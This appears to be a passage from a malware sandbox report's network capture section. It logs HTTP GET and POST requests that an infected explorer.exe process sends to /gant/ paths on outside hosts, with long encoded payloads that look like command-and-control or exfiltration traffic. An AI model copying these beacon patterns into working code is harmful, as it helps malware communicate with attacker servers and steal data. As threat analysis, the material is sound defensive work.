                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 35 76 66 35 73 46 6f 69 69 6b 51 70 4b 38 4d 47 73 51 55 71 4d 6e 56 37 5a 75 56 43 65 5a 4b 48 7a 36 7a 6b 50 62 53 41 53 6f 57 57 4c 65 7a 6c 6e 75 28 4d 55 63 79 57 7a 67 70 68 54 57 6c 35 72 44 75 77 65 4f 57 61 72 75 69 6a 41 4e 6f 57 59 31 65 64 4f 77 6a 58 53 49 59 34 6a 61 78 4b 30 4b 4e 65 78 61 4a 51 67 6e 75 7a 36 5f 52 36 44 64 6b 41 65 43 30 49 33 67 6e 55 73 4b 45 63 67 76 28 73 34 32 42 55 45 4e 72 73 72 2d 47 31 54 42 6c 59 5a 39 4a 79 42 34 4e 50 71 6f 72 64 64 46 55 39 4d 6e 6e 75 42 48 75 50 47 4d 50 4e 4f 49 4c 75 69 64 41 50 51 6c 55 72 5a 43 4a 55 57 4c 6d 70 46 52 4e 55 28 72 7e 71 52 69 4c 31 6e 68 4c 43 53 35 69 70 43 66 67 30 6e 48 52 38 74 69 49 6e 6c 45 4e 79 73 58 42 5f 42 4d 4c 58 6d 59 78 59 73 62 34 32 59 68 52 35 46 41 45 50 74 76 54 43 71 6e 69 71 55 44 50 48 4c 74 56 62 32 4a 4a 6b 54 61 46 34 30 42 66 67 69 4f 6c 52 4c 70 69 47 70 72 6b 65 74 6c 42 63 69 46 28 4b 37 44 70 58 7e 34 75 53 56 44 55 4b 6d 78 6d 72 4f 45 61 4d 77 6e 4c 4b 51 67 62 5f 4b 6e 32 34 43 50 61 4c 32 58 6e 4f 4e 4c 48 77 4f 6b 61 45 58 39 62 68 4a 34 42 6c 32 6d 48 4f 58 5f 4f 6f 73 45 30 58 63 36 53 4d 63 54 48 67 49 31 58 43 46 35 71 42 55 61 75 62 49 6f 5a 4a 42 50 55 41 58 54 61 58 78 34 71 44 72 43 67 6e 30 57 63 51 58 6b 79 4e 74 4e 4c 73 38 47 65 71 71 4c 58 63 45 69 42 74 72 55 67 61 5a 37 73 69 75 2d 63 37 44 69 36 7a 49 5a 41 42 63 53 51 6e 42 45 46 34 43 33 73 59 77 53 69 32 4f 42 62 55 62 6e 38 76 51 44 48 77 37 31 30 62 4e 55 32 49 53 77 28 5a 6d 76 31 6c 67 65 71 78 6c 6c 71 65 61 69 68 39 30 4e 58 73 74 30 61 6c 6b 35 41 5f 75 43 6e 4f 66 4f 30 4f 58 57 59 6f 35 41 53 71 4b 62 65 56 6d 47 49 6b 37 36 32 4a 4a 61 4d 31 6d 37 41 4c 63 77 36 64 31 42 35 39 64 78 65 34 53 56 58 65 48 54 6d 47 6b 72 57 4b 67 51 6e 4a 79 6e 6d 73 78 6b 4f 5a 65 44 38 64 64 61 76 74 30 75 4e 36 36 5f 56 6a 57 77 47 43 42 4a 6f 41 63 49 4b 73 4c 6b 32 45 6f 4e 57 58 58 51 43 53 59 46 36 6d 33 5f 54 58 57 79 47 56 73 5f 35 47 59 4b 76 4d 41 30 52 6f 57 42 58 66 46 69 77 46 59 7a 57 4a 49 73 50 4c 35 6a 79 6c 38 7a 64 6a 53 30 49 58 49 6d 45 5a 54 4b 4d 57 5a 44 71 59 79 70 47 32 30 2d 4c 44 6d 69 62 72 49 75 63 70 58 35 6d 37 4b 41 69 39 4c 53 33 73 31 69 52 79 48 51 57 76 4e 5a 4a 30 6a 74 36 45 6c 4c 53 4c 55 55 53 4b 77 6d 51 74 44 37 52 66 77 6a 50 32 78 7a 68 78 35 6a 52 4f 41 43 4a 47 35 35 7e 61 7a 4b 4c 57 55 6c 74 64 41 6a 4f 74 7e 44 49 4c 4b 42 7e 75 63 6f 4b 58 6f 68 4a 44 57 35 6d 34 38 4c 58 71 43 56 5a 61 4d 6e 43 53 6f 47 6c 42 70 5a 6e 6e 6a 48 7e 34 73 50 71 77 4e 68 67 38 33 55 28 5f 48 6a 39 54 72 49 65 77 39 64 72 77 39 4a 77 45 32 77 42 44 4b 69 6e 51 34 36 4d 50 47 35 46 32 55 71 69 68 30 48 6a 62 47 55 49 53 41 32 50 37 70 72 57 65 4a 6c 4f 74 68 4a 56 6f 32 48 5a 57 56 4e 66 71 49 53 53 4c 33 38 36 39 50 68 59 6f 76 58 77 52 7e 4c 65 7a 51 4d 42 6b 4e 6e 4a 36 69 76 33 66 46 65 48 6e 55 59 43 33 71 57 63 6c 6a 78 56 59 71 34 30 7a 49 39 47 6a 59 77 54 6f 50 6a 79 35 74 4f 65 35 4d 51 58 57 73 47 34 4c 34 34 52 6d 42 6b 43 68 4d 61 79 5f 77 65 43 77 56 44 39 45 36 67 49 47 30 32 53 4c 34 73 6a 68 6d 78 78 36 4e 65 59 42 56 75 28 65 54 39 78 62 78 4e 70 39 73 44 47 55 37 4f 32 35 63 79 70 48 39 30 7a 61 4c 76 4a 6d 75 5f 4e 6e 73 4f 43 63 6c 5a 36 73 48 53 70 7a 68 59 52 59 6f 65 35 56 37 46 72 6c 6e 6b 76 30 36 56 66 39 32 72 52 38 62 7a 35 45 71 45 41 63 46 73 34 5f 75 46 39 78 46 74 65 76 54 4d 30 64 4f 6a 72 73 59 64 4a 52 56 71 44 57 4a 57 51 70 68 32 64 48 44 6c 34 2d 67 70 36 6f 7e 52 6e 38 69 62 6b 52 7e 57 38 33 50 55 48 36 34 30 6f 63 71 55 74 75 74 66 6e 49 67 36 61 77 50 51 41 70 62 68 32 78 75 31 38 79 37 54 57 48 49 79 58 67 73 44 35 75 4c 7a 64 76 49 5f 52 42 46 48 69 76 44 4d 58 6b 30 75 43 74 35 6c 6a 49 52 58 4e 4a 4c 2d 42 69 52 47 67 73 31 61 53 66 32 5a 56 47 4c 37 72 46 74 5a 4f 65 7a 68 70 65 79 73 7e 77 75 4f 38 61 30 37 5a 64 6a 35 71 50 43 33 4a 78 36 51 37 77 52 31 6f 5a 4e 4b 5a 2d 74 4a 52 54 6e 52 49 74 77 46 30 7a 57 56 77 56 30 51 42 44 30 54 76 53 4a 67 56 6a 6d 4c 77 71 4d 64 36 5a 49 5a 5a 76 7a 56 66 49 65 73 37 33 53 79 58 52 74 51 30 4e
                                                                                                                  Data Ascii: j-Jh9P=5vf5sFoiikQpK8MGsQUqMnV7ZuVCeZKHz6zkPbSASoWWLezlnu(MUcyWzgphTWl5rDuweOWaruijANoWY1edOwjXSIY4jaxK0KNexaJQgnuz6_R6DdkAeC0I3gnUsKEcgv(s42BUENrsr-G1TBlYZ9JyB4NPqorddFU9MnnuBHuPGMPNOILuidAPQlUrZCJUWLmpFRNU(r~qRiL1nhLCS5ipCfg0nHR8tiInlENysXB_BMLXmYxYsb42YhR5FAEPtvTCqniqUDPHLtVb2JJkTaF40BfgiOlRLpiGprketlBciF(K7DpX~4uSVDUKmxmrOEaMwnLKQgb_Kn24CPaL2XnONLHwOkaEX9bhJ4Bl2mHOX_OosE0Xc6SMcTHgI1XCF5qBUaubIoZJBPUAXTaXx4qDrCgn0WcQXkyNtNLs8GeqqLXcEiBtrUgaZ7siu-c7Di6zIZABcSQnBEF4C3sYwSi2OBbUbn8vQDHw710bNU2ISw(Zmv1lgeqxllqeaih90NXst0alk5A_uCnOfO0OXWYo5ASqKbeVmGIk762JJaM1m7ALcw6d1B59dxe4SVXeHTmGkrWKgQnJynmsxkOZeD8ddavt0uN66_VjWwGCBJoAcIKsLk2EoNWXXQCSYF6m3_TXWyGVs_5GYKvMA0RoWBXfFiwFYzWJIsPL5jyl8zdjS0IXImEZTKMWZDqYypG20-LDmibrIucpX5m7KAi9LS3s1iRyHQWvNZJ0jt6ElLSLUUSKwmQtD7RfwjP2xzhx5jROACJG55~azKLWUltdAjOt~DILKB~ucoKXohJDW5m48LXqCVZaMnCSoGlBpZnnjH~4sPqwNhg83U(_Hj9TrIew9drw9JwE2wBDKinQ46MPG5F2Uqih0HjbGUISA2P7prWeJlOthJVo2HZWVNfqISSL3869PhYovXwR~LezQMBkNnJ6iv3fFeHnUYC3qWcljxVYq40zI9GjYwToPjy5tOe5MQXWsG4L44RmBkChMay_weCwVD9E6gIG02SL4sjhmxx6NeYBVu(eT9xbxNp9sDGU7O25cypH90zaLvJmu_NnsOCclZ6sHSpzhYRYoe5V7Frlnkv06Vf92rR8bz5EqEAcFs4_uF9xFtevTM0dOjrsYdJRVqDWJWQph2dHDl4-gp6o~Rn8ibkR~W83PUH640ocqUtutfnIg6awPQApbh2xu18y7TWHIyXgsD5uLzdvI_RBFHivDMXk0uCt5ljIRXNJL-BiRGgs1aSf2ZVGL7rFtZOezhpeys~wuO8a07Zdj5qPC3Jx6Q7wR1oZNKZ-tJRTnRItwF0zWVwV0QBD0TvSJgVjmLwqMd6ZIZZvzVfIes73SyXRtQ0NRfhv1dfz9X~whyppI31KEMi327INhZtC~_~-oUAWYlWhc8IpwCqKq3blJuVsBa2Uaxxs4hsMMtickukeX8H4ft7gONBESQCRnM0BIOhJglW2iL(2NqJbtazxxOiI7GD5qEeraM6CJoDU5apx4Udr84XQJlpu0fpceDQnxAU36cPx~RjV5pHlGHu2PvVnwg1KdeL-NYmwfjmhHdYU1gMmudYoquVz628FXLMIZgkJkjSGaGgI4IYEJzJ6wIhHXM140D~ItuMLYyoAikKVDOkj0RcN9D0xwdyPTMUwRVRxacI_(U9Kc8ediqq-LDvw(I3nPy3lKHG2(UEcrFwNcD96C9wMQqCGJuveG7~jCb02THPK9y3p5DrA6YA_9PEN~9LQ5mENLLKy3_sZesek0s3BwSc2(KgMpUZTq4LJSICuA4yNKRjHBtCPoEfcM2nld2NdX2SFAQktI5KJVSJS133yS6f2goL8VU3sWGHPHVVnOMZ8gLkEfhqI(DRajXot8UV04SK3Plk0vuWzRooAKqrkBKA3n-MVYTI54GT3dpz6PsIBteo4FoCJpV2Smo(sRKIWsUMqxOKA6jlDkzpY8rQn1HH7MHOi38TXvoEKTaFRuxIeHzcYutrg(RJbFXq0jjvS3TE3vEaxlBkgMU5nY1UYVp(ZfYtsfm4kzkEKyGn5qZnJ16hmRyMSQhB7gK44(vLi40GiL1fDqWTT(tDbURjW(PB8SMoyZmlCxMGzc_TPhFpxy1cjlYRmeZEgVGhtVBj2yBNjnv~EdnE7CsrnRchtgXNqQGEDLg88AAcOjl
                                                                                                                  Feb 13, 2023 19:02:01.897317886 CET939OUTData Raw: 51 56 63 69 6e 4f 4b 54 58 31 6c 73 35 77 79 34 41 73 41 6f 45 2d 52 42 6f 65 38 76 50 5f 73 50 7e 49 36 38 63 68 52 33 42 73 77 6c 4a 75 4e 63 58 42 42 41 33 54 71 78 42 58 46 52 35 68 52 57 4d 30 62 56 58 56 79 4a 39 33 53 6b 41 39 37 38 73 6c
                                                                                                                  Data Ascii: QVcinOKTX1ls5wy4AsAoE-RBoe8vP_sP~I68chR3BswlJuNcXBBA3TqxBXFR5hRWM0bVXVyJ93SkA978slGhPeBiRfC25rQjUkjJOBETAQQuHXUEpOuGBeYJ5eOH0LpqKvXQw4V2CA54~iQQIPHXfqKdbKsrP4wCw0je2aIxA58mFQVkFZm9746A5pDlqz73CkLzfX8eRzuN5Hrgu3Sw11pKmdCi0esoU0aMXECEgQWL5SOfC3C
                                                                                                                  Feb 13, 2023 19:02:01.897361994 CET940OUTData Raw: 44 32 7e 43 6c 4f 7a 54 4f 79 65 67 52 69 48 71 65 39 63 37 46 6e 6d 54 69 59 75 58 37 4a 55 6f 38 4f 53 61 58 65 4f 59 57 64 56 77 43 52 62 43 61 64 6b 31 68 37 4d 61 58 6c 49 73 63 49 43 57 36 6f 62 5a 46 50 72 71 4f 65 32 46 72 5a 59 66 53 77
                                                                                                                  Data Ascii: D2~ClOzTOyegRiHqe9c7FnmTiYuX7JUo8OSaXeOYWdVwCRbCadk1h7MaXlIscICW6obZFPrqOe2FrZYfSwkQTD5iPnJys0rZfJl15_sCPrn-o-RLIQSEx4gcJaJjLghjXEyimYuFOmHh2tOiar0E4R2gCpMVsR65Pi00iLcnXfkbLGUd2etuHmP0eq9UoNVxTpvRR6D5tiMFZqd-4_lufnR2BbpPlQAE(6RYVjLTv3Yn7yAr7Qr


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  34192.168.11.2049879192.154.231.17480C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:02:04.705719948 CET941OUTGET /gant/?j-Jh9P=0t3ZvwpEqVsRCOwRlikXMWB7Ea95BZez04foFL6wYLCqffSg77P+YtyukHRVRGclol71et68nIyUJ+scOlPmXgSdPrpnjIlS4g==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.sciencevale.xyz
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  35192.168.11.204988075.102.22.16880C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:02:10.580450058 CET942OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.hotelyeah.top
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.hotelyeah.top
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.hotelyeah.top/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 79 36 47 2d 4d 32 55 48 63 4f 6a 44 58 71 73 4f 4b 77 4f 79 49 47 47 36 64 32 76 6f 75 43 33 4d 4e 70 36 66 72 58 70 54 69 47 51 2d 46 54 76 4c 77 33 58 48 6d 79 6c 46 38 63 5a 79 36 33 55 58 5a 43 67 7a 39 68 78 2d 74 6a 64 68 31 58 66 38 43 2d 68 41 48 50 54 63 4b 64 6b 4d 77 5a 68 79 59 44 6f 47 34 6d 4c 4c 46 32 32 4d 69 2d 78 58 71 55 74 46 37 72 79 77 78 69 37 4f 69 57 32 37 68 79 53 57 76 31 47 4e 32 6e 43 72 64 64 64 47 28 4a 31 57 54 4e 42 6d 70 77 70 6f 49 58 55 7a 4e 4b 46 78 73 68 48 31 78 61 54 32 56 48 59 64 44 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=y6G-M2UHcOjDXqsOKwOyIGG6d2vouC3MNp6frXpTiGQ-FTvLw3XHmylF8cZy63UXZCgz9hx-tjdh1Xf8C-hAHPTcKdkMwZhyYDoG4mLLF22Mi-xXqUtF7rywxi7OiW27hySWv1GN2nCrdddG(J1WTNBmpwpoIXUzNKFxshH1xaT2VHYdDA).
                                                                                                                  Feb 13, 2023 19:02:10.691014051 CET943INHTTP/1.1 404 Not Found
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                  pragma: no-cache
                                                                                                                  content-type: text/html
                                                                                                                  content-length: 1238
                                                                                                                  date: Mon, 13 Feb 2023 18:02:10 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                                                                                  Feb 13, 2023 19:02:10.691092014 CET944INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                                                                                  Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  36192.168.11.204988175.102.22.16880C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:02:13.219039917 CET945OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.hotelyeah.top
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.hotelyeah.top
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.hotelyeah.top/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 79 36 47 2d 4d 32 55 48 63 4f 6a 44 58 4c 63 4f 46 33 36 79 5a 32 47 35 52 57 76 6f 6c 69 32 46 4e 70 32 66 72 56 46 44 69 30 30 2d 46 78 48 4c 78 7a 37 48 6c 79 6c 46 30 38 5a 37 30 58 55 4d 5a 43 38 64 39 6c 31 2d 74 6a 5a 68 30 6c 58 38 53 65 68 44 4d 76 54 66 44 39 6b 33 6e 4a 68 34 59 44 73 30 34 69 4c 4c 46 69 7e 4d 77 4c 6c 58 75 47 56 47 73 62 79 2d 67 53 37 4a 74 32 32 78 68 79 57 30 76 33 57 37 33 58 36 72 64 2d 56 47 38 4a 31 56 64 39 42 62 32 67 6f 6e 50 58 63 36 41 6f 6c 4f 79 77 6a 52 38 71 79 75 51 56 77 52 42 46 7e 51 65 4e 39 75 71 5a 63 35 62 30 28 52 6d 4a 67 78 30 4c 31 6c 66 46 58 51 33 70 65 6a 31 4e 34 42 46 6f 59 5a 48 69 31 73 61 43 79 59 67 74 57 4f 72 37 43 58 4e 4e 6f 2d 6c 5f 65 5a 38 47 73 66 65 2d 65 61 64 47 69 49 74 72 71 50 30 56 5a 6a 47 39 53 44 61 59 4a 47 72 66 4a 44 37 31 46 51 41 4e 48 46 52 43 4f 58 4e 7a 48 74 4f 34 7e 7a 64 38 75 35 31 4d 62 33 4a 44 69 53 57 30 28 4d 32 7a 35 41 76 64 51 59 57 66 36 50 38 6e 44 61 30 34 37 71 54 5a 74 52 77 44 48 48 78 5f 34 75 28 44 65 68 41 48 61 6e 7e 4c 46 6b 33 71 67 68 79 77 50 35 69 56 64 48 71 41 6a 2d 4c 4f 79 37 79 59 6c 64 53 44 7a 4c 32 33 61 77 6e 33 32 46 6c 47 73 57 68 6e 59 4b 4a 48 55 6f 70 69 72 37 62 44 67 5f 53 76 6c 62 74 37 79 49 46 55 4b 61 30 74 57 43 6d 55 35 47 36 49 4c 66 75 5f 67 73 5a 4f 33 54 6b 61 41 4f 6c 72 6d 34 4d 64 77 48 54 77 68 4d 76 78 6d 79 76 52 41 77 74 55 36 6b 55 66 4f 35 71 30 62 63 74 41 4f 42 69 77 31 41 65 56 46 38 55 6d 54 64 4b 5a 4c 75 36 56 48 37 6e 58 57 76 31 4c 39 48 38 36 56 67 47 64 34 70 4d 6d 49 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=y6G-M2UHcOjDXLcOF36yZ2G5RWvoli2FNp2frVFDi00-FxHLxz7HlylF08Z70XUMZC8d9l1-tjZh0lX8SehDMvTfD9k3nJh4YDs04iLLFi~MwLlXuGVGsby-gS7Jt22xhyW0v3W73X6rd-VG8J1Vd9Bb2gonPXc6AolOywjR8qyuQVwRBF~QeN9uqZc5b0(RmJgx0L1lfFXQ3pej1N4BFoYZHi1saCyYgtWOr7CXNNo-l_eZ8Gsfe-eadGiItrqP0VZjG9SDaYJGrfJD71FQANHFRCOXNzHtO4~zd8u51Mb3JDiSW0(M2z5AvdQYWf6P8nDa047qTZtRwDHHx_4u(DehAHan~LFk3qghywP5iVdHqAj-LOy7yYldSDzL23awn32FlGsWhnYKJHUopir7bDg_Svlbt7yIFUKa0tWCmU5G6ILfu_gsZO3TkaAOlrm4MdwHTwhMvxmyvRAwtU6kUfO5q0bctAOBiw1AeVF8UmTdKZLu6VH7nXWv1L9H86VgGd4pMmI.
                                                                                                                  Feb 13, 2023 19:02:13.329621077 CET946INHTTP/1.1 404 Not Found
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                  pragma: no-cache
                                                                                                                  content-type: text/html
                                                                                                                  content-length: 1238
                                                                                                                  date: Mon, 13 Feb 2023 18:02:13 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 